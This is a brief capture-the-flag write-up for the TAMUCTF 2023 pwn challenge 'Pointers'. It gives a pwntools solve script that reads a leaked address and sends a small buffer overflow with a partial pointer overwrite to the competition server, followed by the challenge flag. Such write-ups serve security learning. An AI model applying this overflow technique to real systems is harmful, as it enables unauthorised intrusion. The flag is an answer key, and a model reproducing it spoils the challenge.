ʕ·ᴥ·ʔ






Pointers

05/04/2023

By: unvariant

Tags: pwn TAMUCTF-2023

Problem Description:

I've been messing with pointers lately which never goes wrong, right?

Hints:

Reveal Hints None
Solve script 
from pwn import *

p = remote("tamuctf.com", 443, ssl=True, sni="pointers")

p.recvuntil(b"being stored at ")
leak = int(p.recvline(), 16)
print(f"leak: {leak:x}")

target = leak + 0x20 + 0x08

p.send(b"A" * 8 + p16(target & 0xFFFF))

p.interactive()

Flag: gigem{small_overflows_are_still_effective}